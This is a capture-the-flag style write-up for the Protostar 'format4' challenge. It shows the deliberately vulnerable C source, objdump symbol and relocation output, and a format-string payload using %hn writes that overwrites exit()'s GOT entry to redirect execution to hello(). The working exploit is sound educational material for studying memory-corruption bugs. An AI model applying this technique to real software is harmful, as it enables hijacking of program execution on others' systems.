Protostar vm, format4

protostar

Here is the source of the vulnerable program :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int target;

void hello()
{
  printf("code execution redirected! you win\n");
  _exit(1);
}

void vuln()
{
  char buffer[512];

  fgets(buffer, sizeof(buffer), stdin);

  printf(buffer);

  exit(1);   
}

int main(int argc, char **argv)
{
  vuln();
}

Again, slight variation of the previous challenge, we have to write an arbitrary address somewhere in the stack. This time though, we have to redirect the execution flow. In order to do that we will replace the address of exit() by the address of hello().

Thanks to the hint, we can easily spot the right addresses :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
user@protostar:~$ objdump -t /opt/protostar/bin/format4 | grep hello
080484b4 g     F .text  0000001e              hello

user@protostar:~$ objdump -TR /opt/protostar/bin/format4
/opt/protostar/bin/format4:     file format elf32-i386

DYNAMIC SYMBOL TABLE:
00000000  w   D  *UND*  00000000              __gmon_start__
00000000      DF *UND*  00000000  GLIBC_2.0   fgets
00000000      DF *UND*  00000000  GLIBC_2.0   __libc_start_main
00000000      DF *UND*  00000000  GLIBC_2.0   _exit
00000000      DF *UND*  00000000  GLIBC_2.0   printf
00000000      DF *UND*  00000000  GLIBC_2.0   puts
00000000      DF *UND*  00000000  GLIBC_2.0   exit
080485ec g    DO .rodata  00000004  Base        _IO_stdin_used
08049730 g    DO .bss 00000004  GLIBC_2.0   stdin


DYNAMIC RELOCATION RECORDS
OFFSET   TYPE              VALUE 
080496fc R_386_GLOB_DAT    __gmon_start__
08049730 R_386_COPY        stdin
0804970c R_386_JUMP_SLOT   __gmon_start__
08049710 R_386_JUMP_SLOT   fgets
08049714 R_386_JUMP_SLOT   __libc_start_main
08049718 R_386_JUMP_SLOT   _exit
0804971c R_386_JUMP_SLOT   printf
08049720 R_386_JUMP_SLOT   puts
08049724 R_386_JUMP_SLOT   exit


user@protostar:~$ /opt/protostar/bin/./format4
ABAB%X.%X.%X.%X.%X.%X.
ABAB200.B7FD8420.BFFFF604.42414241.252E5825.58252E58.
user@protostar:~$

We have to write 080484b4 at 08049724, our string is accessible at the 4th parameter of printf. I discovered that I could write 16 bit integers using the %hn modifier. This way I can write the desired address in two step.

So herre is what’s going to be written and where

08049724 -> 0x84b4

08049726 -> 0x0804

My payload is pretty much the same as last time :

1
2
3
4
user@protostar:~$ python -c 'print "\x26\x97\x04\x08\x24\x97\x04\x08%2044x%4$hn%31920x%5$hn"' > payload 
user@protostar:~$ cat payload - | /opt/protostar/bin/./format4
&�$�200                                                                                                                                                                                                                                                                                                                                                                                                                                                            b7fd8420
code execution redirected! you win

Working !